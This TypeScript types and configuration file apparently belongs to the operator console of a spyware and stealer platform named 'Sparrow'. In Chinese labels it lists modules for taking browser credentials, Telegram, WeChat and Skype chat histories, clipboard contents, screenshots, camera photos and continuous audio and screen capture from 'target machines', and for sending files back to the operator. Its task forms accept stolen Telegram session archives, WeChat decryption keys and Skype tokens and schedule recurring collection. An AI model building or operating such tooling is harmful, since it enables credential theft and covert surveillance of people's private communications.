export interface Task {
    id: string,
    projId: string,
    uid: string,
    status: number,
    type: number,
    payload: string,
    resPayload: string,
    createAt: string,
    updateAt: string,
    pwd: string,
}
export interface CrontabTask {
    id: string,
    projId: string,
    uid: string,
    status: number,
    type: number,
    payload: string,
    resPayload: string,
    createAt: string,
    updateAt: string,
    taskId: string,
    crontabPayload: string,
    runMode: number,
    duration: number,
    scheduleTime: string,
    lastRuntime: string,
    runLog: string,
}

export interface SparrowGenTaskReqParam {
    toolList: string,
    machineNameList: string,
    whiteListDir: string,
    isDebug: boolean,
    screenshotInterval: number,
    recordingDuration: number,
}

export enum TaskTypeEnum {
    SparrowGen = 1,
    TgMsgCode = 22,
    WeChatMsgCode = 23,
    SkypeMsgCode = 21,
    FileConstructionCode = 11,
    BrowserCode = 71,
}


export enum TaskStatusEnum {
    StatusIdle = 0,
    StatusProcessing = 1,
    StatusDownloading = 2,
    StatusFinished = 3,
    StatusFailed = 4,
    StatusPending = 5
}

export interface SparrowToolInfo {
    name: string,
    label: string
    description: string,
    isAdmin: boolean,
    hasChildren?: boolean
    children?: SparrowToolInfo[]
}

export const SparrowToolNameList = {
    SysInfoName: "sysinfo",
    FilesName: "files",
    MegaName: "mega",
    BrowserName: "browser",
    ScreenshotName: "screenshot",
    SoftInfoName: "softinfo",
    TelegramName: "telegram",
    TelegramOldName: "telegramOld",
    SkypeName: "skype",
    WechatName: "wechat",
    ClipboardName: "clipboard",
    ContinuousTaskName: "continuousTask",
    MegaToolsName: "megaTools",
    CameraName: "camera",
}

export const SparrowToolNameLabelMap: Map<string, string> = new Map<string, string>([
    [SparrowToolNameList.SysInfoName, "系统信息"],
    [SparrowToolNameList.FilesName, "文件结构"],
    [SparrowToolNameList.MegaName, "文件回传"],
    [SparrowToolNameList.BrowserName, "浏览器凭证密取"],
    [SparrowToolNameList.ScreenshotName, "屏幕截图"],
    [SparrowToolNameList.SoftInfoName, "第三方软件个人信息"],
    [SparrowToolNameList.TelegramName, "(新版)Telegram聊天记录密取"],
    [SparrowToolNameList.TelegramOldName, "Telegram聊天记录密取"],
    [SparrowToolNameList.SkypeName, "Skype聊天记录密取"],
    [SparrowToolNameList.WechatName, "微信聊天记录密取"],
    [SparrowToolNameList.ClipboardName, "剪切板历史记录"],
    [SparrowToolNameList.ContinuousTaskName, "环境密取"],
    [SparrowToolNameList.MegaToolsName, "环境密取增量拉取"],
    [SparrowToolNameList.CameraName, "摄像头控制"],
]);

export const GetSparrowToolNameLabelByName = (name: string): string => {
    const res = SparrowToolNameLabelMap.get(name)
    return res ? res : ""
}

export const SparrowToolMap: SparrowToolInfo[] = [
    {
        name: "primary", label: "基础模块", description: "基础模块", isAdmin: false, children: [
            {
                name: SparrowToolNameList.SysInfoName,
                label: GetSparrowToolNameLabelByName(SparrowToolNameList.SysInfoName),
                description: "获取目标系统的硬件信息",
                isAdmin: false,
            },
            {
                name: SparrowToolNameList.FilesName,
                label: GetSparrowToolNameLabelByName(SparrowToolNameList.FilesName),
                description: "获取目标机器的文件目录结构",
                isAdmin: true,
                children: [
                    {
                        name: SparrowToolNameList.MegaName,
                        label: GetSparrowToolNameLabelByName(SparrowToolNameList.MegaName),
                        description: "主要文件回传",
                        isAdmin: true
                    },
                ]
            },
            {
                name: SparrowToolNameList.BrowserName,
                label: GetSparrowToolNameLabelByName(SparrowToolNameList.BrowserName),
                description: "密取目标机器中常见浏览器凭证",
                isAdmin: false
            },
            {
                name: SparrowToolNameList.ScreenshotName,
                label: GetSparrowToolNameLabelByName(SparrowToolNameList.ScreenshotName),
                description: "获取目标的屏幕截图",
                isAdmin: false
            },
            {
                name: SparrowToolNameList.SoftInfoName,
                label: GetSparrowToolNameLabelByName(SparrowToolNameList.SoftInfoName),
                description: "获取目标机器中常见第三方软件中的个人身份信息",
                isAdmin: false
            },
            {
                name: SparrowToolNameList.TelegramName,
                label: GetSparrowToolNameLabelByName(SparrowToolNameList.TelegramName),
                description: "(新)获取目标机器上的Telegram聊天记录",
                isAdmin: false
            },
            {
                name: SparrowToolNameList.TelegramOldName,
                label: GetSparrowToolNameLabelByName(SparrowToolNameList.TelegramOldName),
                description: "获取目标机器上的Telegram聊天记录",
                isAdmin: false
            },
            {
                name: SparrowToolNameList.SkypeName,
                label: GetSparrowToolNameLabelByName(SparrowToolNameList.SkypeName),
                description: "获取目标机器上的Skype聊天记录",
                isAdmin: false
            },
            {
                name: SparrowToolNameList.WechatName,
                label: GetSparrowToolNameLabelByName(SparrowToolNameList.WechatName),
                description: "获取目标机器上的微信聊天记录",
                isAdmin: false
            },
            {
                name: SparrowToolNameList.ClipboardName,
                label: GetSparrowToolNameLabelByName(SparrowToolNameList.ClipboardName),
                description: "获取目标机器上的剪切板历史记录",
                isAdmin: false
            },
            {
                name: SparrowToolNameList.CameraName,
                label: GetSparrowToolNameLabelByName(SparrowToolNameList.CameraName),
                description: "获取目标机器上的摄像头信息并使用摄像头拍照(摄像头会有提示)",
                isAdmin: false
            },
            {
                name: SparrowToolNameList.ContinuousTaskName,
                label: GetSparrowToolNameLabelByName(SparrowToolNameList.ContinuousTaskName),
                description: "持续获取屏幕截图、剪切板、录音的守护任务",
                isAdmin: true
            },
        ]
    },
    {
        name: "extra", label: "其他模块", description: "其他模块", isAdmin: false, children: [
            {
                name: SparrowToolNameList.MegaToolsName,
                label: GetSparrowToolNameLabelByName(SparrowToolNameList.MegaToolsName),
                description: "环境密取增量拉取",
                isAdmin: true
            },
        ]
    },
];

export const TaskType = new Map<number, string>([
    [22, "Telegram"],
    [23, "微信"],
    [21, "Skype"],
    [11, "文件结构"],
    [71, "浏览器"],
])

export const CrontabTaskStatusFilter = [
    { text: '周期任务', value: 1 },
    { text: '每日任务', value: 2 },
    { text: '单次任务', value: 3 },
]

export const TaskStatusFilter = [
    { text: '未知', value: 0 },
    { text: '处理中', value: 1 },
    { text: '获取中', value: 2 },
    { text: '成功', value: 3 },
    { text: '错误', value: 4 },
    { text: '等待', value: 5 },
]
export const TaskTypesFilter = [
    { text: 'Telegram', value: 22 },
    { text: '微信', value: 23 },
    { text: 'Skype', value: 21 },
    { text: '文件结构', value: 11 },
    { text: '浏览器', value: 71 },
]

export interface TaskPagination {
    pageSize: number,
    pageNum: number,
}

export interface fileUploadLabel {
    name: string,
    tip: string
}

export interface CreateTaskOption {
    name: string,
    type: string,
    rules?: any,
    children?: CreateTaskOption[],
}

type FileUploadMap = Map<number, [fileUploadLabel[], CreateTaskOption[]]>;

export const newTaskLabelMap: FileUploadMap = new Map([ //file,content
    [11, [
        [
            {
                name: "文件上传",
                tip: "请上传.zip格式的文件"
            }
        ],
        []]],
    [22, [
        [
            {
                name: "文件上传",
                tip: `Telegram的tdata打包方式必须为所有文件被压缩在第一级目录下而不是直接对tdata进行压缩(应选中文件夹中所有文件后进行压缩，而不是直接压缩文件夹)
    · 如tdata.zip的结构应为
        - tdata.zip
            - settings
            - key_datas
            - …
    · 不支持如下形式
        - tdata.zip
            - tdata
                - settings
                - key_datas
                - …`,
            }
        ],
        [
            {
                name: "deviceModel",
                type: "input"
            }, {
                name: "systemVersion",
                type: "input"
            }, {
                name: "appVersion",
                type: "input"
            }, {
                name: "passcode",
                type: "input"
            }, {
                name: "proxySettings",
                type: "radio",
                rules: [
                    {
                        required: true,
                        message: 'Please select',
                        trigger: 'blur',
                    },
                ],
                children: [
                    {
                        name: "proto",
                        type: "select",
                        rules: [
                            {
                                required: true,
                                message: 'Please input ',
                                trigger: 'blur',
                            },
                        ],
                    },
                    {
                        name: "host",
                        type: "input",
                        rules: [
                            {
                                required: true,
                                message: 'Please input ',
                                trigger: 'blur',
                            },
                        ],
                    },
                    {
                        name: "port",
                        type: "input",
                        rules: [
                            {
                                required: true,
                                message: 'Please input ',
                                trigger: 'blur',
                            },
                        ],
                    },
                    {
                        name: "username",
                        type: "input"
                    },
                    {
                        name: "password",
                        type: "input"
                    },
                ],
            }, {
                name: "crontab",
                type: "radio",
                rules: [
                    {
                        required: true,
                        message: 'Please select',
                        trigger: 'blur',
                    },
                ],
                children: [
                    {
                        name: "runMode",
                        type: "select",
                        rules: [
                            {
                                required: true,
                                message: 'Please choose',
                                trigger: 'blur',
                            },
                        ],
                    },
                    {
                        name: "chooseTime",
                        type: "map",
                        rules: [
                            {
                                required: true,
                                message: 'Please input',
                                trigger: 'blur',
                            },
                        ],
                    },
                ],
            }
        ]
    ]],
    [23, [
        [
            {
                name: "文件上传",
                tip: "请上传.zip格式的文件"
            }
        ],
        [
            {
                name: "wechatDecodeKey",
                type: "input",
                rules: [
                    {
                        required: true,
                        message: 'Please input ',
                        trigger: 'blur',
                    },
                ],
            }]
    ]],
    [71, [

        [
            {
                name: "文件上传",
                tip: "请上传由PBD生成的.zip格式的文件(文件名为Source_Data.zip)"
            }
        ],
        []]],
    [21, [
        [],
        [
            {
                name: "token",
                type: "input"
            }, {
                name: "crontab",
                type: "radio",
                rules: [
                    {
                        required: true,
                        message: 'Please select',
                        trigger: 'blur',
                    },
                ],
                children: [
                    {
                        name: "runMode",
                        type: "select",
                        rules: [
                            {
                                required: true,
                                message: 'Please choose',
                                trigger: 'blur',
                            },
                        ],
                    },
                    {
                        name: "chooseTime",
                        type: "map",
                        rules: [
                            {
                                required: true,
                                message: 'Please input',
                                trigger: 'blur',
                            },
                        ],
                    },
                ],
            }
        ]
    ]],
]);
export const genTaskFormRules = [

]

export const tgProtoOptions = [
    {
        value: "socks5"
    }, {
        value: "MTProto",
        disabled: true
    }
]

export interface OptionConstruction {
    value: string | number,
    label: string,
    disabled?: boolean,
}

export const crontabIntervalType = 1
export const crontabDailyType = 2
export const crontabOnceType = 3
export const selectOptionMap: Map<string, OptionConstruction[]> = new Map([
    ["proto", [
        {
            value: "socks5",
            label: "socks5",
        }, {
            value: "MTProto",
            label: "MTProto",
            disabled: true
        }
    ]],
    ["runMode", [
        {
            label: "周期任务（需选择每次任务执行的时间间隔）",
            value: crontabIntervalType,
        }, {
            label: "每日定时任务（需选择每日任务执行的时间点）",
            value: crontabDailyType,
        }, {
            label: "单次定时任务（需选择本次任务执行的时间点）",
            value: crontabOnceType,
        },
    ]]
])

export const optionsMapTypeMap: Map<string, [string, Map<string, string>]> = new Map([
    ["crontab",
        [
            "runMode",
            new Map([
                [crontabIntervalType.toString(), "inputNumber"],
                [crontabDailyType.toString(), "time"],
                [crontabOnceType.toString(), "dateTime"],
            ])
        ]
    ]
],)

export const label2KeyMap: Map<string, string> = new Map([
    ["wechatDecodeKey", "微信解密密钥"],
    ["deviceModel", "设备名"],
    ["systemVersion", "系统名"],
    ["appVersion", "APP版本"],
    ["passCode", "passcode"],
    ["proxySettings", "是否使用代理"],
    ["proto", "代理类型"],
    ["host", "host"],
    ["port", "port"],
    ["username", "用户名"],
    ["password", "密码"],
    ["crontab", "是否设为定时任务"],
    ["runMode", "定时任务类型"],
    ["chooseTime", "选择时间"]
])

export const label2Placeholder: Map<string, string> = new Map([
    ["deviceModel", "PC"],
    ["systemVersion", "Windows"],
    ["appVersion", "4.12.2"]
])


export type CreateTaskStatusType = "idle" | "processing" | "success" | "failed";

export interface TaskState {
    taskList: Task[],
    selectedProj: string,
    dummyTargetId: string,
    selectedTarget: string,
    isLoading: boolean,
    createStatus: CreateTaskStatusType,
    taskListByUid: Task[],
    isTaskByUidLoading: boolean,
    isTaskByUidAllLoaded: boolean,
    taskPagination: TaskPagination,
    taskListMap: Record<string, { payload: string, payloadRes: string, isLoading: boolean }>
}

export const defaultDummyTargetId = "dummy";
